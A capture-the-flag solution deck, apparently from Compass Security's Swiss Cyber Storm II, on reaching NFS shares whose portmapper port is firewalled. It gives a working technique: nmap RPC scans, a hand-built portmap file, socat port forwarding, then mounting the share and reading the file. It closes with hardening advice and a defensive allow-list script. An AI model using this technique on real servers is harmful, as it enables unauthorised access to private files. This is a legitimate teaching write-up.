Swiss Cyber Storm II Case: NFS Hacking




Slide 1: Swiss Cyber Storm II Case: NFS Hacking
Axel Neumann <axel.neumann@csnc.ch>
Compass Security AG, Glärnischstrasse 7, Postfach 1628, CH-8640 Rapperswil
Tel +41 55-214 41 60, Fax +41 55-214 41 61, team@csnc.ch, www.csnc.ch

Slide 2: What is NFS?
- Network File System (NFS) is a network file system protocol for UNIX developed by Sun Microsystems
- Access files over a network as if the network share were attached as a local hard disk
- NFS makes use of RPCs (Remote Procedure Calls)
- The corresponding file sharing protocol for Windows is SMB (aka CIFS)
Authentication for NFS
- Under NFSv3 it is the client computer that authenticates (by IP address)
- Since NFSv4, user authentication is possible (Kerberos)

Slide 3: Typical NFSv3 Session (simplified)

Slide 4: Typical NFSv3 Session (simplified)
1. Client connects to the portmapper (port 111) and asks for the port number of the mount daemon (mountd)
2. Portmapper returns the port number of mountd
3. Client connects to mountd and asks for the file handle of /knownshareddirectory
4. mountd returns file handle 0
5. Client connects to the portmapper and asks for the NFS port number (nfsd)
6. Portmapper returns the port number of nfsd

Slide 5: Typical NFSv3 Session (simplified)
8. Client connects to nfsd and executes the LOOKUP routine, using file handle 0 and the file/directory name
9. nfsd returns file handle 1 for that file/directory name
10. Client executes the READ routine, using file handle 1
11. nfsd returns the contents of that file/directory
The portmapper is essential for NFSv3

Slide 6: Swiss Cyber Storm NFS Case
What is the goal of the case?
- Get access to the file geheim-5022.txt, which is stored on the NFS server
What do we know?
- Server IP: 192.168.200.203
- Exact name of share and file: home/geheim/geheim-5022.txt
- A dump of rpcinfo

Slide 7: Swiss Cyber Storm NFS Solution
Test the NFS server for exported shares:
    bash# showmount -e 192.168.200.203
    mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
showmount: The command showmount can be used to get information about the shared directories of an NFS server

Slide 8: Scan the server (TCP)
In the second step, we use Nmap's RPC grinder to detect open RPC ports, the RPC program and the protocol version (TCP):
    bash# nmap -sR -p 1-65535 192.168.200.203
    Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-04 09:33 UTC
    Interesting ports on ubuntu-vm (192.168.200.203):
    Not shown: 65530 closed ports
    PORT      STATE    SERVICE  VERSION
    111/tcp   filtered rpcbind
    2049/tcp  open     nfs      2-4 (rpc #100003)
    51979/tcp open     nlockmgr 1-4 (rpc #100021)
    57543/tcp open     mountd   1-3 (rpc #100005)
    60644/tcp open     status   1 (rpc #100024)
    MAC Address: 00:0C:29:1D:50:0C (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 12.898 seconds

Slide 9: Scan the server (UDP)
Again, we use Nmap's RPC grinder to detect open RPC ports, the RPC program and the protocol version (UDP):
    bash# nmap -sUR -p 1-65535 192.168.200.203
    Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-04 09:39 UTC
    Interesting ports on ubuntu-vm (192.168.200.203):
    PORT      STATE         SERVICE  VERSION
    68/udp    open|filtered dhcpc
    111/udp   closed        rpcbind
    806/udp   open|filtered unknown
    2049/udp  open          nfs      2-4 (rpc #100003)
    5353/udp  open|filtered zeroconf
    44139/udp open          status   1 (rpc #100024)
    49456/udp open|filtered unknown
    52663/udp open          nlockmgr 1-4 (rpc #100021)
    55545/udp open          mountd   1-3 (rpc #100005)
    MAC Address: 00:0C:29:1D:50:0C (VMware)

Slide 10: The Shortcut
As you could drink dozens of coffees before the UDP scan finishes, we take the shortcut: http://192.168.200.203/nfs/rpcinfo.out
    program vers proto   port
     100000    2   tcp    111  portmapper
     100024    1   udp  44139  status
     100024    1   tcp  60644  status
     100021    2   tcp  51979  nlockmgr
     100021    2   udp  52663  nlockmgr
     100003    2   tcp   2049  nfs
     100003    3   tcp   2049  nfs
     100003    4   tcp   2049  nfs
    ... output shortened

Slide 11: Port status and description
rpcbind:  Provides a mapping from a service name to the port number it is running on
nlockmgr: Forwards local file locking requests to the lock manager on the server system
mountd:   The rpc.mountd server provides an ancillary service needed to satisfy mount requests by NFS clients
nfsd:     The rpc.nfsd program implements the user-level part of the NFS service
status:   If an NFS server crashes and comes back alive, rpc.statd can notify clients about that event. As this is only an informational service, it can be neglected for attacking NFS

Slide 12: Scanning results
- The scan revealed the ports that are used by the NFS server
- Port 111 (portmapper) is closed
- All other ports used by NFS remain open
- Assumption: the administrator just blocked the portmapper's port to deny NFS usage

Slide 13: NFS without portmapper
- NFSv3 needs the portmapper to work properly!
- Does the portmapper have to be on the NFS server itself?
- Let's try to build our own portmapper service!

Slide 14: Create your own portmap file
Read out service, port number, RPC number and version of the available NFS services:
    PORT      STATE SERVICE  VERSION
    2049/udp  open  nfs      2-4 (rpc #100003)
    52663/udp open  nlockmgr 1-4 (rpc #100021)
    55545/udp open  mountd   1-3 (rpc #100005)
    2049/tcp  open  nfs      2-4 (rpc #100003)
    51979/tcp open  nlockmgr 1-4 (rpc #100021)
    57543/tcp open  mountd   1-3 (rpc #100005)
Create the port file (portmap.txt) using the information above (example for the service nfs):
    # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE
    100003 2 tcp 2049 nfs
    100003 3 tcp 2049 nfs
    100003 4 tcp 2049 nfs
    100003 2 udp 2049 nfs
    100003 3 udp 2049 nfs
    100003 4 udp 2049 nfs

Slide 15: Complete portmap file (portmap.txt)
    # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE
    100000 2 tcp 111 portmapper
    100000 2 udp 111 portmapper
    100003 2 tcp 2049 nfs
    100003 3 tcp 2049 nfs
    100003 4 tcp 2049 nfs
    100003 2 udp 2049 nfs
    100003 3 udp 2049 nfs
    100003 4 udp 2049 nfs
    100005 1 tcp 57543 mountd
    100005 2 tcp 57543 mountd
    100005 3 tcp 57543 mountd
    100005 1 udp 55545 mountd
    100005 2 udp 55545 mountd
    100005 3 udp 55545 mountd
    100021 1 tcp 51979 nlockmgr
    100021 2 tcp 51979 nlockmgr
    100021 3 tcp 51979 nlockmgr
    100021 4 tcp 51979 nlockmgr
    100021 1 udp 52663 nlockmgr
    100021 2 udp 52663 nlockmgr
    100021 3 udp 52663 nlockmgr
    100021 4 udp 52663 nlockmgr

Slide 16: Using the portmap file
Now start your own local instance of the portmapper and load the newly created, self-defined portmap file (portmap.txt):
    bash# portmap
    bash# pmap_set < portmap.txt
Check the local portmapper. When working correctly, it returns the mapping that is defined in the file:
    bash# rpcinfo -p 127.0.0.1
    program vers proto   port
     100000    2   tcp    111  portmapper
     100024    1   udp  44139  status
     100024    1   tcp  60644  status
     100021    2   tcp  51979  nlockmgr
     100021    2   udp  52663  nlockmgr
     100003    2   tcp   2049  nfs
     100003    3   tcp   2049  nfs
     100003    4   tcp   2049  nfs
    ... output shortened

Slide 17: Tricking the NFS server
- We now have our own portmapper service. It only runs locally and knows nothing about remote NFS services
- Our local portmapper has the same configuration as the one running on the NFS server
- To connect, we simply have to configure local port forwarding of the corresponding NFS ports using socat, inetd, ssh, ...

Slide 18: Local portmapper -> Remote NFS
Again, look at the scanning results for all detected NFS ports:
    PORT      STATE SERVICE  VERSION
    2049/udp  open  nfs      2-4 (rpc #100003)
    52663/udp open  nlockmgr 1-4 (rpc #100021)
    55545/udp open  mountd   1-3 (rpc #100005)
    2049/tcp  open  nfs      2-4 (rpc #100003)
    51979/tcp open  nlockmgr 1-4 (rpc #100021)
    57543/tcp open  mountd   1-3 (rpc #100005)
Create local port forwarding to the original NFS server for all ports (in this example, we are using the tool socat):
    # nfs service TCP,UDP
    socat tcp4-listen:2049,fork tcp4-connect:192.168.200.203:2049 &
    socat udp4-listen:2049,fork udp4-connect:192.168.200.203:2049 &
    # mountd service TCP,UDP
    socat tcp4-listen:57543,fork tcp4-connect:192.168.200.203:57543 &
    socat udp4-listen:55545,fork udp4-connect:192.168.200.203:55545 &
    # nlockmgr TCP,UDP
    socat tcp4-listen:51979,fork tcp4-connect:192.168.200.203:51979 &
    socat udp4-listen:52663,fork udp4-connect:192.168.200.203:52663 &

Slide 19: Mount remote NFS share
Query the shares of the remote NFS server by using localhost as the NFS server:
    bash# showmount -e 127.0.0.1
    Export list for 127.0.0.1:
    /home/geheim *
Mount the remote NFS share locally:
    bash# mount -t nfs 127.0.0.1:/home/geheim /mnt
Read the file:
    bash# cat /mnt/geheim-5022.txt
    Gratuliere, du hast den NFS Case gelöst!

Slide 20: Recommendations
- If you use firewalls, always prefer whitelisting when giving access to the individual services (blocking the portmapper port alone leaves every other RPC port reachable)
- Prefer NFSv4 (many security enhancements)
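As an added illustration for the scanning results (slide 12) and the whitelisting recommendation (slide 20), the following Python script is not part of the slides: it parses the RPC grinder output from slides 8 and 9, lists the RPC services that stay reachable while only port 111 is filtered, and derives the allow-list a firewall policy needs instead. The trusted client network 192.168.200.0/24 and the nftables-style rule text are assumptions.

```python
import re

# Scan lines as printed on slides 8 and 9 (TCP and UDP RPC grinder output).
SCAN_OUTPUT = """\
111/tcp filtered rpcbind
2049/tcp open nfs 2-4 (rpc #100003)
51979/tcp open nlockmgr 1-4 (rpc #100021)
57543/tcp open mountd 1-3 (rpc #100005)
60644/tcp open status 1 (rpc #100024)
111/udp closed rpcbind
2049/udp open nfs 2-4 (rpc #100003)
44139/udp open status 1 (rpc #100024)
52663/udp open nlockmgr 1-4 (rpc #100021)
55545/udp open mountd 1-3 (rpc #100005)
"""

# One scan line: "PORT/PROTO STATE SERVICE [VERSIONS (rpc #PROGRAM)]".
LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<svc>\S+)"
    r"(?:\s+(?P<vers>\d+(?:-\d+)?)\s+\(rpc #(?P<prog>\d+)\))?$")

def parse_scan(text):
    """Parse scan lines into dicts; a version range such as 1-4 becomes [1, 2, 3, 4]."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip headers, the MAC address line and other chatter
        lo, _, hi = (m["vers"] or "").partition("-")
        versions = list(range(int(lo), int(hi or lo) + 1)) if lo else []
        rows.append({"port": int(m["port"]), "proto": m["proto"],
                     "state": m["state"], "service": m["svc"],
                     "program": int(m["prog"]) if m["prog"] else None,
                     "versions": versions})
    return rows

def exposed_rpc_services(rows):
    """RPC programs that answer on their own port and so stay reachable
    with the portmapper (port 111) filtered, which is what the case exploits."""
    return sorted((r["service"], r["proto"], r["port"]) for r in rows
                  if r["state"] == "open" and r["program"] is not None)

def allowlist_rules(rows, trusted_net):
    """Illustrative nftables-style allow-list (assumed syntax): every scanned port,
    portmapper included, only from trusted_net; the chain policy is then drop.
    mountd, nlockmgr and status ports are dynamic unless pinned in the NFS config."""
    ports = sorted({(r["proto"], r["port"]) for r in rows})
    return [f"ip saddr {trusted_net} {proto} dport {port} accept"
            for proto, port in ports]
```

Running `exposed_rpc_services(parse_scan(SCAN_OUTPUT))` on the slide data returns eight service/port pairs, i.e. everything except rpcbind itself.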

Slide 21: Used software
- Nmap (http://nmap.org)
- socat (http://www.dest-unreach.org/socat/)
- NFS tools (http://www.linux-nfs.org/)
- Portmap (http://neil.brown.name/portmap/)

Slide 22: Questions